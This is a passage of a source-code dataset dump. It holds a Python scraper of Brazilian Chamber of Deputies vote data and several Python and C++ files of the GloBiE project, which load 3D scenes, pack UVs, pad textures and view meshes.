urllib\nimport argparse\nimport os.path\nimport xml.etree.ElementTree as ET\nimport pickle as pkl\nimport pandas as pd \nimport sqlalchemy\nfrom sqlalchemy import create_engine\n\n\n\"\"\"Obtém a lista de situações para proposições.\"\"\"\nvotoprop_url = (\"http://www.camara.leg.br/SitCamaraWS/Proposicoes.asmx/\"\n \"ObterVotacaoProposicao?tipo=PEC&numero=241&ano=2016\")\n\nvotoprop = []\nvotopar = []\n\nurl = urllib.urlopen(votoprop_url)\ndata = ET.fromstring(url.read())\ncount = 0\nfor item in data:\n for vot in item.findall('Votacao'):\n count += 1\n for vots in vot.findall('votos'):\n for dep in vots.findall('Deputado'):\n deputado = dep.get('Nome')\n voto = dep.get('Voto')\n votoprop.append([deputado, voto, count])\n for orie in vot.findall('orientacaoBancada'):\n for ban in orie.findall('bancada'):\n partido = ban.get('Sigla')\n orientacao = dep.get('Voto')\n votopar.append([partido, orientacao, count])\n\nvotoprop_df = pd.DataFrame(votoprop, columns=[\"deputado\", \"voto\", \"votacao\"])\n\nvotoprop_df = votoprop_df.pivot(index='deputado', columns='votacao', values='voto')\nvotoprop_df = votoprop_df.fillna('5')\nvotoprop_df.to_csv('votoprop.csv', sep=',', encoding=\"latin1\")\n\n\nvotopar_df = pd.DataFrame(votopar, columns=[\"partido\", \"orientacao\", \"votacao\"])\n\nvotopar_df = votopar_df.pivot(index='partido', columns='votacao', values='orientacao')\nvotopar_df = votopar_df.fillna('5')\nvotopar_df.to_csv('votopar.csv', sep=',', encoding=\"latin1\")\n\n" }, { "alpha_fraction": 0.807692289352417, "alphanum_fraction": 0.807692289352417, "avg_line_length": 66.4000015258789, "blob_id": "d2b139d286ae7f05ce7858b85a1127489a65b154", "content_id": "d6d58abd7666b3bc564e0435e8440eddd8c3df27", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 338, "license_type": "no_license", "max_line_length": 162, "num_lines": 5, "path": "/README.md", "repo_name": "vinicius-dourado/chamberofdeputiesBrazil", "src_encoding": "UTF-8", "text": "# chamberofdeputiesBrazil\n\nThis pool of files are some extractors that access Brazilian PArlament's web services and get all the projects, speechs, transcriptions, deputie's data and so on.\n\nIn the file categorizacao_automatica.py, the aim is read all the speechs and classify the deputy with the themes that they are more related with.\n\n" } ]
7
cg-saarland/GloBiE
https://github.com/cg-saarland/GloBiE
f2a2cc30427cd6d7d56d78393961485b98ff5970
23cb52e8c06716667eca2c174f3f732b20315098
2ea5551f50b03d06f6098ea8c516c0653ceca508
refs/heads/master
2020-12-21T16:08:52.685177
2020-01-27T15:25:46
2020-01-27T15:25:46
236,484,857
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.48022347688674927, "alphanum_fraction": 0.49206703901290894, "avg_line_length": 29.442176818847656, "blob_id": "40b32b0ae97275e7fa66b08e86b7cefe79f64d0b", "content_id": "783c4ce90c4884bc1666d8f624d70cc4533ce968", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4475, "license_type": "permissive", "max_line_length": 69, "num_lines": 147, "path": "/visitor.py", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "import glm\n\nimport scene\n\n\nclass SceneVisitor:\n def visit_SceneNode(self, node: scene.SceneNode, direction: str):\n pass\n\n def visit_Group(self, group: scene.Group, direction: str):\n pass\n\n def visit_Mesh(self, mesh: scene.Mesh, direction: str):\n pass\n\n\nclass MeshCounter(SceneVisitor):\n def __init__(self, start=0):\n self.count = start\n self.disable = False\n\n def visit_Mesh(self, mesh: scene.Mesh, direction: str):\n if direction != 'forward' or self.disable:\n return\n self.count += 1\n # self.disable = True\n\n\nclass TriCounter(SceneVisitor):\n def __init__(self, start=0):\n self.count = start\n self.disable = False\n\n def visit_Mesh(self, mesh: scene.Mesh, direction: str):\n if direction != 'forward' or self.disable:\n return\n self.count += len(mesh.triangles)\n # self.disable = True\n\n\nclass SimplePacker(object):\n def __init__(self, m: int, n: int, pixelSize: int):\n self.i = 0\n self.m = m\n self.n = n\n tileSize = pixelSize / max([m, n])\n self.paddedScaling = (tileSize - 1) / tileSize\n\n def bucket(self):\n y = self.i // self.m\n x = self.i % self.m\n if self.i > self.m * self.n - 1:\n return None\n self.i += 1\n M = glm.mat3(self.paddedScaling / self.m, 0, 0, 0,\n self.paddedScaling / self.n, 0, 0, 0, 1)\n M[2][0] = float(x) / self.m\n M[2][1] = float(y) / self.n\n\n # debug verbose\n # out = []\n # for child in M:\n # lines = repr(child).splitlines()\n # out.append(\" - %s\" % lines[0])\n # out += [\" \" * 3 + line for line in lines[1:]]\n # print(\" SimplePacker.bucket x: %d y: %d\\n%s\" %\n # (x, y, \"\\n\".join(out)))\n\n return M\n\n\nclass TransformedTriExtractor(SceneVisitor):\n def __init__(self,\n vertices,\n normals,\n texcoord,\n startIdx=0,\n globalTf=glm.mat4(1),\n packer=SimplePacker(4, 4, 1024)):\n self.vertices = vertices\n self.normals = normals\n self.texcoord = texcoord\n self.tfStack = []\n self.tf = globalTf\n self.idx = startIdx\n self.disable = False\n self.packer = packer\n self.mapping = {}\n\n def visit_Group(self, group: scene.Group, direction: str):\n if self.disable:\n return\n\n if direction == 'forward':\n self.tfStack.append(self.tf)\n self.tf = self.tf * group.transform\n else:\n self.tf = self.tfStack.pop()\n\n def visit_Mesh(self, mesh: scene.Mesh, direction: str):\n if self.disable:\n return\n if direction != 'forward':\n return\n\n # print(\"visitting mesh {} with geometry {}\".format(\n # mesh.parent.parent.name, mesh.parent.name))\n hasGlobalUVs = False\n for tri in mesh.triangles:\n if tri.globalUVs is not None:\n hasGlobalUVs = True\n\n # print(\" {}\".format(hasGlobalUVs))\n\n # if hasGlobalUVs:\n uvTf = self.packer.bucket()\n if uvTf is not None:\n allEntries = [x for col in uvTf for x in col]\n # print(\" allEntries\")\n # print(\" {}\".format(allEntries))\n self.mapping[mesh.parent.parent.name] = allEntries\n\n # print(\" {}\".format(mesh.triangles[0].globalUVs))\n for tri in mesh.triangles:\n\n for k in range(3):\n vi = glm.vec4(tri.vertices[k], 1.0)\n vo = self.tf * vi\n for i in range(3):\n self.vertices[self.idx, k, i] = vo[i] / vo[3]\n if tri.normals is not None:\n ni = glm.vec4(tri.normals[k], 0.0)\n no = self.tf * ni\n l = glm.length(no)\n if l > 0:\n for i in range(3):\n self.normals[self.idx, k, i] = no[i] / l\n if tri.globalUVs is None or uvTf is None:\n self.texcoord[self.idx, k, :] = [1.0, 1.0]\n else:\n ti = glm.vec3(tri.globalUVs[k], 1.0)\n to = uvTf * ti\n for i in range(2):\n self.texcoord[self.idx, k, i] = to[i] / to[2]\n\n self.idx += 1\n # self.disable = True\n" }, { "alpha_fraction": 0.5223880410194397, "alphanum_fraction": 0.6865671873092651, "avg_line_length": 16, "blob_id": "f6ab6601a852a7aa9a2c996aeabc9ae79de1f591", "content_id": "f627e27a21582dd76da11b9ffe0bf59a43acc209", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 67, "license_type": "permissive", "max_line_length": 21, "num_lines": 4, "path": "/requirements-dev.txt", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "pyglet>=1.4.8\nratcave>=0.8.0\npyInstaller>=3.5\nauto-py-to-exe>=2.6.6" }, { "alpha_fraction": 0.6941340565681458, "alphanum_fraction": 0.7108938694000244, "avg_line_length": 26.5, "blob_id": "ecf7cb815c0ffb247f86ab3874affae5a71e4961", "content_id": "0247c220e4299de755e2a864124196c6f3f2f447", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 716, "license_type": "permissive", "max_line_length": 157, "num_lines": 26, "path": "/README.md", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "\n# GloBiE\n\n## Prerequisites\n\n - Working [AnyDSL](https://github.com/AnyDSL/anydsl.git) build with [LLVM](http://releases.llvm.org/) including [RV](https://github.com/cdl-saarland/rv.git)\n - [CMake](https://cmake.org/)\n - [Python](https://www.python.org/) including development package\n - [pybind11](https://github.com/pybind/pybind11.git)\n\n## Build instructions\n\n```\n$ pip install -r requirements.txt\n$ pip install -r requirements-dev.txt\n$ mkdir build\n$ cd build && cmake -DAnyDSL_runtime_DIR=<path to anydsl_runtime-config.cmake> -Dpybind11_DIR=<path to pybind11-config.cmake> ..\n$ cmake --build build\n```\n\n## Running the webservice\n\n```\n$ python server.py\n```\n\nAccess to the exposed API via port 8080 by default.\n" }, { "alpha_fraction": 0.5483871102333069, "alphanum_fraction": 0.5717741847038269, "avg_line_length": 26.86516761779785, "blob_id": "9bb16512e118313391e97d077327544303a4b849", "content_id": "6baf0f613ffca95c912d8f66d768a7ab0b2ba8d3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2480, "license_type": "permissive", "max_line_length": 66, "num_lines": 89, "path": "/blur.py", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "from PIL import Image\nimport numpy as np\n\nfrom service import default_out_dir\n\n\ndef clamp(n, smallest, largest):\n return max(smallest, min(n, largest))\n\n\n# assets for debugging\nDBG_blur_file = 'assets/4x5hard.png'\nDBG_blur_file = 'assets/4x5soft.png'\nDBG_blur_file = 'assets/border.png'\nDBG_blur_file = 'out/test.png'\n\nim_frame = Image.open(DBG_blur_file)\nimgData = im_frame.getdata()\n\nloaded = im_frame.load()\n\noriginalImg = np.array(imgData, np.uint8)\nnewImg = np.array(imgData, np.uint8)\n\nwidth = imgData.size[0]\nheight = imgData.size[1]\nnb = [\n [],\n [],\n [],\n [],\n # [],\n [],\n [],\n [],\n [],\n]\nfor column in range(0, width):\n for row in range(0, height):\n # pixel raster around center pixel\n # 0 1 2\n # 3 c 4\n # 5 6 7\n centerIdx = column + row * width\n leftCol = clamp(column - 1, 0, width - 1)\n rightCol = clamp(column + 1, 0, width - 1)\n upperRow = clamp(row - 1, 0, height - 1)\n lowerRow = clamp(row + 1, 0, height - 1)\n\n nb[0] = originalImg[leftCol + upperRow * width]\n nb[1] = originalImg[column + upperRow * width]\n nb[2] = originalImg[rightCol + upperRow * width]\n\n nb[3] = originalImg[leftCol + row * width]\n centerPixel = originalImg[centerIdx]\n nb[4] = originalImg[rightCol + row * width]\n\n nb[5] = originalImg[leftCol + lowerRow * width]\n nb[6] = originalImg[column + lowerRow * width]\n nb[7] = originalImg[rightCol + lowerRow * width]\n\n # check alpha channel\n if centerPixel[3] == 0:\n\n valid_pixels = list(filter(lambda x: x[3] > 0, nb))\n lenValPix = len(valid_pixels)\n if lenValPix > 0:\n # take average of red channel\n avg = 0\n for ii in range(lenValPix):\n avg += valid_pixels[ii][0]\n avg = int(avg / lenValPix)\n loaded[column, row] = (avg, avg, avg, 255)\n\n elif centerPixel[3] < 255:\n # make semitransparent areas fully visible\n loaded[column, row] = (centerPixel[0], centerPixel[1],\n centerPixel[2], 255)\n print(\"column %d of %d\" % (column, width))\n\n# pythonArray = newImg.tolist()\n# newImgAsImage = Image.fromarray(pythonArray, 'RGBA')\n# convertedImage = newImgAsImage.convert(\"RGB\")\n# convertedImage.save(\"art.png\")\n\nim_frame.save(default_out_dir + \"padded.png\")\n\nim_frame.show()\nprint(\"huhu\")\n" }, { "alpha_fraction": 0.47089946269989014, "alphanum_fraction": 0.5464165210723877, "avg_line_length": 29.144927978515625, "blob_id": "4a80d8e0021d61635b4b571826ec493520a30bac", "content_id": "3ad08b04a30c0405520f405a2ccb0d44bd64dc6b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2079, "license_type": "permissive", "max_line_length": 79, "num_lines": 69, "path": "/util.py", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "import hashlib\nimport glm\nimport scene\n\nfrom pathlib import Path\n\ndefault_out_dir = Path.cwd() / 'out'\nif not default_out_dir.exists():\n default_out_dir.mkdir(parents=True)\n\n\n# https://en.wikipedia.org/wiki/ANSI_escape_code#3/4_bit\ndef colorprint(text: str, color: int) -> None:\n print(\"\\x1B[1;\" + str(color) + \"m\" + text + \"\\x1B[m\")\n\n\ndef prepareOutFilename(inFileName: str, resolution: int) -> str:\n utf8bytes: bytes = (inFileName + str(resolution)).encode(\"utf8\")\n hash_object = hashlib.md5(utf8bytes)\n result: str = \"AO_\" + hash_object.hexdigest()\n return result\n\n\ndef joinOutputPath(filename: str, extension: str) -> str:\n return default_out_dir / (filename + '.' + extension)\n\n\ndef make_quad(v0, span0, span1):\n v1 = v0 + span0\n v2 = v0 + span0 + span1\n v3 = v0 + span1\n t0 = scene.Triangle(v0, v1, v2)\n t0.globalUVs = [glm.vec2(0.0, 0.0), glm.vec2(1.0, 0.0), glm.vec2(1.0, 1.0)]\n t1 = scene.Triangle(v2, v3, v0)\n t1.globalUVs = [glm.vec2(1.0, 1.0), glm.vec2(0.0, 1.0), glm.vec2(0.0, 0.0)]\n mesh = scene.Mesh('quad')\n mesh.add(t0)\n mesh.add(t1)\n return mesh\n\n\ndef test_scene():\n floor = scene.Group('.floor')\n floor.add(\n make_quad(glm.vec3(-4, 0, 0.8), glm.vec3(8, 0, 0), glm.vec3(0, 6, 0)))\n box = scene.Group('.box')\n s = 2.0\n box.add(\n make_quad(glm.vec3(1.0, 2.0, 1.0), glm.vec3(s, 0, 0),\n glm.vec3(0, 0, s)))\n box.add(\n make_quad(glm.vec3(1.0, 2.0, 1.0), glm.vec3(0, 0, s),\n glm.vec3(0, s, 0)))\n box.add(\n make_quad(glm.vec3(1.0, 2.0, 1.0), glm.vec3(0, s, 0),\n glm.vec3(s, 0, 0)))\n box.add(\n make_quad(glm.vec3(1.0, 2.0, 1.0 + s), glm.vec3(s, 0, 0),\n glm.vec3(0, s, 0)))\n box.add(\n make_quad(glm.vec3(1.0 + s, 2.0, 1.0), glm.vec3(0, s, 0),\n glm.vec3(0, 0, s)))\n box.add(\n make_quad(glm.vec3(1.0, 2.0 + s, 1.0), glm.vec3(0, 0, s),\n glm.vec3(s, 0, 0)))\n root = scene.Group('.')\n root.add(floor)\n root.add(box)\n return root" }, { "alpha_fraction": 0.5686211585998535, "alphanum_fraction": 0.5869845151901245, "avg_line_length": 28.846153259277344, "blob_id": "d387a3a98a4ad09bce56024f3770e07281e1ac70", "content_id": "dc05d698627ea7d42833bca92761f8f67d047efb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3104, "license_type": "permissive", "max_line_length": 90, "num_lines": 104, "path": "/viewer.py", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "import pyglet\nimport numpy\nimport ratcave\nimport PIL\n\nvert_shader = \"\"\"\n#version 120\n\nattribute vec3 vertexPosition;\nattribute vec2 vertexTexcoord;\n\nuniform mat4 projection_matrix, view_matrix, model_matrix;\n\nvarying vec2 fragTexCoord;\n\nvoid main()\n{\n\tgl_Position = projection_matrix * view_matrix * model_matrix * vec4(vertexPosition, 1.0);\n\tfragTexCoord = vertexTexcoord;\n}\n\"\"\"\n\nfrag_shader = \"\"\"\n#version 120\n\nuniform sampler2D TextureMap;\n\nvarying vec2 fragTexCoord;\n\nvoid main()\n{\n\tvec4 color = texture2D(TextureMap, fragTexCoord);\n\tgl_FragColor = vec4(color.rgb, 1.);\n}\n\"\"\"\n\n\ndef debug_view(vertices, texcoord, image=None, window_size=(800, 600)):\n # creates the window and sets its properties\n width, height = window_size\n window = pyglet.window.Window(width=width,\n height=height,\n caption='Debug Viewer',\n resizable=False)\n\n num_verts = 3 * vertices.shape[0]\n model = ratcave.Mesh(arrays=(vertices.reshape(num_verts, 3),\n texcoord.reshape(num_verts, 2)))\n model.position.xyz = 0, 0, -10\n\n if image is not None:\n image = image.transpose(PIL.Image.FLIP_TOP_BOTTOM)\n imgdata = pyglet.image.ImageData(image.width, image.height, 'RGBA',\n image.tobytes())\n mipmap = False\n tex = imgdata.get_mipmapped_texture(\n ) if mipmap else imgdata.get_texture()\n pyglet.gl.glBindTexture(pyglet.gl.GL_TEXTURE_2D, 0)\n model.textures.append(\n ratcave.Texture(id=tex.id, data=tex, mipmap=mipmap))\n\n scene = ratcave.Scene(meshes=[model])\n scene.camera.projection = ratcave.PerspectiveProjection(60.0,\n width /\n float(height),\n z_far=100.0)\n\n def update(dt):\n pass\n\n pyglet.clock.schedule(update)\n\n shader = ratcave.Shader(vert=vert_shader, frag=frag_shader)\n\n @window.event\n def on_resize(width, height):\n # TODO update scene.camera.projection.viewport\n scene.camera.projection.aspect = width / float(height)\n return pyglet.event.EVENT_HANDLED\n\n @window.event\n def on_draw():\n with shader:\n scene.draw()\n\n @window.event\n def on_mouse_scroll(x, y, scroll_x, scroll_y):\n # scroll the MOUSE WHEEL to zoom\n scene.camera.position.z -= scroll_y / 10.0\n\n @window.event\n def on_mouse_drag(x, y, dx, dy, button, modifiers):\n # press the LEFT MOUSE BUTTON to rotate\n if button == pyglet.window.mouse.LEFT:\n model.rotation.y += dx / 5.0\n model.rotation.x -= dy / 5.0\n\n # press the LEFT and RIGHT MOUSE BUTTONS simultaneously to pan\n if button == pyglet.window.mouse.LEFT | pyglet.window.mouse.RIGHT:\n scene.camera.position.x -= dx / 100.0\n scene.camera.position.y -= dy / 100.0\n\n # starts the application\n pyglet.app.run()\n" }, { "alpha_fraction": 0.5873146653175354, "alphanum_fraction": 0.593904435634613, "avg_line_length": 27.904762268066406, "blob_id": "ea32a702707bce733540b27ed1db3d4c1ddee00d", "content_id": "5aa23c47c44467b0fb2d19c0d6f242e2e5a5ad4c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1214, "license_type": "permissive", "max_line_length": 85, "num_lines": 42, "path": "/remote.py", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "import hashlib\nfrom pathlib import Path\nfrom urlpath import URL\n\ncachedir = Path.cwd() / 'cache'\nif not cachedir.exists():\n cachedir.mkdir(parents=True)\n\n\nclass CachedFile(URL):\n def is_file(self):\n return False\n\n def open(self, mode='r', buffering=-1, encoding=None, errors=None, newline=None):\n return self.filename.open(mode, buffering, encoding, errors, newline)\n\n def resolve(self, strict=False):\n return self.filename.resolve(strict)\n\ndef fetch(url, suffix='.bin', force=False):\n print(\"FETCHING \" + str(url), end=\"\")\n hash = hashlib.sha1(str(url).encode('utf-8')).hexdigest()\n filename = cachedir / (hash + suffix)\n # print()\n # print(filename, end=\"\")\n\n if not filename.is_file() or force:\n print(' [Loading=', end=\"\")\n with url.get() as response:\n print(str(response.status_code) + ']')\n # info = response.info()\n # print(info.get_content_type())\n if response.status_code == 200:\n filename.write_bytes(response.content)\n else:\n return None\n else:\n print(' [' + hash[:11] + ']')\n\n cf = CachedFile(url)\n cf.filename = filename\n return cf\n" }, { "alpha_fraction": 0.46818074584007263, "alphanum_fraction": 0.4875798523426056, "avg_line_length": 34.8220329284668, "blob_id": "0ac285fc52d6e270deeb2a36b5acdd84dc0287f9", "content_id": "017b0f4f648c3e2ac0fdfee90d0d204d8de4af99", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4227, "license_type": "permissive", "max_line_length": 79, "num_lines": 118, "path": "/openctm/__init__.py", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "from .openctm import *\nimport scene\nimport glm\n\n\ndef read(group, file):\n print('Load', file)\n try:\n ctm = ctmNewContext(CTM_IMPORT)\n ctmLoad(ctm, bytes(str(file), 'utf-8'))\n err = ctmGetError(ctm)\n if err != CTM_NONE:\n raise IOError(\"Error loading file: \" + str(ctmErrorString(err)))\n\n # Interpret information\n hasNormals = (ctmGetInteger(ctm, CTM_HAS_NORMALS) == CTM_TRUE)\n\n method = ctmGetInteger(ctm, CTM_COMPRESSION_METHOD)\n if method == CTM_METHOD_RAW:\n methodStr = \"RAW\"\n elif method == CTM_METHOD_MG1:\n methodStr = \"MG1\"\n elif method == CTM_METHOD_MG2:\n methodStr = \"MG2\"\n else:\n methodStr = \"Unknown\"\n\n triCount = ctmGetInteger(ctm, CTM_TRIANGLE_COUNT)\n vertCount = ctmGetInteger(ctm, CTM_VERTEX_COUNT)\n\n # Print information\n print(\"CTM_FILE_COMMENT:\", str(ctmGetString(ctm, CTM_FILE_COMMENT)))\n print(\" CTM_NAME:\", str(ctmGetString(ctm, CTM_NAME)))\n print(\" Triangle count:\", triCount)\n print(\" Vertex count:\", vertCount)\n print(\" Has normals:\", hasNormals)\n print(\" Method:\", methodStr)\n\n # List UV maps\n uvMapCount = ctmGetInteger(ctm, CTM_UV_MAP_COUNT)\n print(\" UV maps:\", uvMapCount)\n for i in range(uvMapCount):\n print(\" CTM_UV_MAP_\" + str(i + 1) + \": \\\"\" +\n str(ctmGetUVMapString(ctm, CTM_UV_MAP_1 + i, CTM_NAME)) +\n \"\\\", ref = \\\"\" +\n str(ctmGetUVMapString(ctm, CTM_UV_MAP_1 +\n i, CTM_FILE_NAME)) + \"\\\"\")\n\n # List attrib maps\n attribMapCount = ctmGetInteger(ctm, CTM_ATTRIB_MAP_COUNT)\n print(\"Attribute maps:\", attribMapCount)\n for i in range(attribMapCount):\n print(\n \" CTM_ATTRIB_MAP_\" + str(i + 1) + \": \\\"\" +\n str(ctmGetAttribMapString(ctm, CTM_ATTRIB_MAP_1 +\n i, CTM_NAME)) + \"\\\"\")\n\n pindices = ctmGetIntegerArray(ctm, CTM_INDICES)\n pvertices = ctmGetFloatArray(ctm, CTM_VERTICES)\n\n # Get normals\n pnormals = None\n if hasNormals:\n pnormals = ctmGetFloatArray(ctm, CTM_NORMALS)\n\n # Get texture coordinates\n ptexCoords = None\n if uvMapCount > 0:\n ptexCoords = ctmGetFloatArray(ctm, CTM_UV_MAP_1)\n\n puvCoords = None\n if uvMapCount > 1:\n puvCoords = ctmGetFloatArray(ctm, CTM_UV_MAP_2)\n\n mesh = scene.Mesh('ctm')\n mesh.parent = group\n\n def readVec3(array, idx):\n return glm.vec3(array[idx * 3], array[idx * 3 + 1],\n array[idx * 3 + 2])\n\n def readVec2(array, idx):\n return glm.vec2(array[idx * 2], array[idx * 2 + 1])\n\n for i in range(triCount):\n i0, i1, i2 = pindices[i * 3], pindices[i * 3 + 1], pindices[i * 3 +\n 2]\n v0, v1, v2 = readVec3(pvertices,\n i0), readVec3(pvertices,\n i1), readVec3(pvertices, i2)\n tri = scene.Triangle(v0, v1, v2)\n\n if hasNormals:\n n0, n1, n2 = readVec3(pnormals, i0), readVec3(pnormals,\n i1), readVec3(\n pnormals, i2)\n tri.normals = (n0, n1, n2)\n\n if ptexCoords:\n t0, t1, t2 = readVec2(ptexCoords, i0), readVec2(\n ptexCoords, i1), readVec2(ptexCoords, i2)\n tri.texcoords = (t0, t1, t2)\n\n if puvCoords:\n uv0, uv1, uv2 = readVec2(puvCoords, i0), readVec2(\n puvCoords, i1), readVec2(puvCoords, i2)\n tri.globalUVs = (uv0, uv1, uv2)\n\n mesh.add(tri)\n\n group.add(mesh)\n\n except Exception as e:\n print('Exception occurred:', e)\n\n finally:\n # Free the OpenCTM context\n ctmFreeContext(ctm)\n" }, { "alpha_fraction": 0.6247654557228088, "alphanum_fraction": 0.6266416311264038, "avg_line_length": 25.649999618530273, "blob_id": "f86a1cf18a9977bf1067bdcf1a626fea47d90627", "content_id": "05eddc88218d5933359845c759eee59950c72b03", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 533, "license_type": "permissive", "max_line_length": 89, "num_lines": 20, "path": "/src/int.h", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "#ifndef INT_H\n#define INT_H\n\ntemplate <typename T, typename S>\nT numeric_cast(S x) {\n static_assert(std::numeric_limits<S>::is_integer, \"argument type is not an integer\");\n static_assert(std::numeric_limits<T>::is_integer, \"return type is not an integer\");\n\n constexpr bool sS = std::numeric_limits<S>::is_signed;\n constexpr bool sT = std::numeric_limits<T>::is_signed;\n if (sS && !sT) {\n assert(x >= 0);\n }\n\n assert(x <= std::numeric_limits<T>::max());\n\n return static_cast<T>(x);\n}\n\n#endif // !INT_H\n" }, { "alpha_fraction": 0.4000000059604645, "alphanum_fraction": 0.6470588445663452, "avg_line_length": 13.166666984558105, "blob_id": "33affa0a2e278dc40702e9c4ecaaf626e6c5e613", "content_id": "3b9b23f7d4977b83f6d831c864908bf8072c158c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 85, "license_type": "permissive", "max_line_length": 15, "num_lines": 6, "path": "/requirements.txt", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "numpy>=1.17.4\nPillow>=6.2.1\nPyGLM>=1.1.2\nbottle>=0.12.17\npaste>=3.2.3\nurlpath>=1.1.4\n" }, { "alpha_fraction": 0.5312293171882629, "alphanum_fraction": 0.5402780771255493, "avg_line_length": 28.6143798828125, "blob_id": "5ed80af82380f138d70afd4d2d724fa41776838d", "content_id": "8f7385d18cd0b1037bf0535961fc200cd91bf605", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4531, "license_type": "permissive", "max_line_length": 101, "num_lines": 153, "path": "/igxc.py", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "import json\nimport glm\nfrom remote import fetch, CachedFile\nimport scene\nimport wavefront\nimport openctm\nfrom pathlib import Path\n\n\ndef readTransform(tTransform):\n tDx = tDy = tDz = 0\n tRx = tRy = tRz = 0\n tSx = tSy = tSz = 1\n\n tf = glm.mat4(1)\n\n if tTransform is None:\n return tf\n\n if \"Position\" in tTransform:\n tPosition = tTransform[\"Position\"]\n\n if tPosition is not None:\n tDx, tDy, tDz = tPosition.get(\"X\", 0), tPosition.get(\n \"Y\", 0), tPosition.get(\"Z\", 0)\n tf = glm.translate(tf, glm.vec3(tDx, tDy, tDz))\n\n if \"Rotation\" in tTransform:\n tRotation = tTransform[\"Rotation\"]\n if tRotation is not None:\n if \"W\" in tRotation and tRotation[\"W\"] <= 1.000001:\n tRx = tRotation[\"X\"]\n tRy = tRotation[\"Y\"]\n tRz = tRotation[\"Z\"]\n tW = tRotation[\"W\"]\n R = glm.mat4_cast(glm.quat(tRx, tRy, tRz, tW))\n else:\n # only one rotation axis allowed\n tRx = glm.radians(tRotation[\"X\"])\n tRy = glm.radians(tRotation[\"Y\"])\n tRz = glm.radians(tRotation[\"Z\"])\n Rx = glm.rotate(glm.mat4(1), tRx, glm.vec3(1, 0, 0))\n Ry = glm.rotate(glm.mat4(1), tRy, glm.vec3(0, 1, 0))\n Rz = glm.rotate(glm.mat4(1), tRz, glm.vec3(0, 0, 1))\n R = Rz * Ry * Rx\n\n tf = tf * R\n\n if \"Scale\" in tTransform:\n tScaling = tTransform[\"Scale\"]\n if tScaling is not None:\n tSx, tSy, tSz = tScaling.get(\"X\", 0), tScaling.get(\n \"Y\", 0), tScaling.get(\"Z\", 0)\n tf = glm.scale(tf, glm.vec3(tSx, tSy, tSz))\n\n # print(\"LOG\", \"Position:\", tDx, tDy, tDz, \"Rotation:\", tRx, tRy, tRz, \"Scaling:\", tSx, tSy, tSz)\n return tf\n\n\ndef loadGeometry(geometry, file, parent: scene.SceneNode):\n if file is None:\n return None\n\n group = scene.Group(geometry)\n\n group.parent = parent\n if file.suffix == '.obj':\n pass # wavefront.read(group, file.open())\n\n if file.suffix == '.ctm':\n openctm.read(group, file.resolve())\n\n return group\n\n\ndef load(igxc, basepath):\n if \"Objects\" not in igxc:\n raise AttributeError(\"'Objects' not in igxc\")\n if \"Geometries\" not in igxc:\n raise AttributeError(\"'Geometries' not in igxc\")\n\n # fetch all referenced geometry\n tFileImport = dict()\n\n if 'BasePath' in igxc:\n basepath = CachedFile(igxc['BasePath'])\n\n try:\n for k, v in igxc['Geometries'].items():\n filename = basepath / v\n if filename.is_file():\n tFileImport[k] = filename\n else:\n tFileImport[k] = fetch(filename, v[-4:])\n # print(tFileImport[k])\n except FileNotFoundError as e:\n print(e)\n raise\n except ConnectionError as e:\n print(e)\n raise\n except Exception as e:\n print(e)\n print(type(e))\n raise\n\n print(len(tFileImport), 'files referenced in total')\n\n # traverse scene graph\n objects = dict()\n meshes = dict()\n root = None\n\n for tObject in igxc['Objects']:\n tComponentPath = tObject.get('Path')\n\n comp = scene.Group(tComponentPath)\n objects[tComponentPath] = comp\n\n if (tComponentPath == '.'):\n root = comp\n tParentPath = ''\n elif (\".\" in tComponentPath):\n tParentPath = tComponentPath[0:tComponentPath.rfind('.')]\n comp.parent = objects.get(tParentPath, root)\n comp.parent.add(comp)\n else:\n tParentPath = '.'\n root.add(comp)\n\n # print(\"LOG\", \"Processing Component\", tComponentPath, \"Parent:\", tParentPath)\n\n comp.transform = readTransform(tObject.get('Transform', None))\n\n tGeometry = tObject.get('Geometry')\n # print(\"LOG\", \"Geometry:\", tGeometry)\n if tGeometry is not None:\n # if tGeometry in meshes:\n # geo = meshes.get(tGeometry)\n # else:\n geometryFile = tFileImport.get(tGeometry)\n # print(\"LOG\", \"geometryFile:\", geometryFile)\n geo = loadGeometry(tGeometry, geometryFile, comp)\n meshes[tGeometry] = geo\n # print(\"LOG\", \"geo:\", geo)\n\n if geo is not None:\n comp.add(geo)\n else:\n print(\"LOG\", \"Geometry:\", tGeometry, \"not found\")\n\n print(len(meshes), 'meshes used in total')\n return root\n" }, { "alpha_fraction": 0.6947314143180847, "alphanum_fraction": 0.7097107172012329, "avg_line_length": 33.55356979370117, "blob_id": "2fb574549dfd9c4555f84bd35a86abeb170b4c94", "content_id": "8a879efa0e0bca36cc75ff27268620138309110a", "detected_licenses": [ "MIT" ], 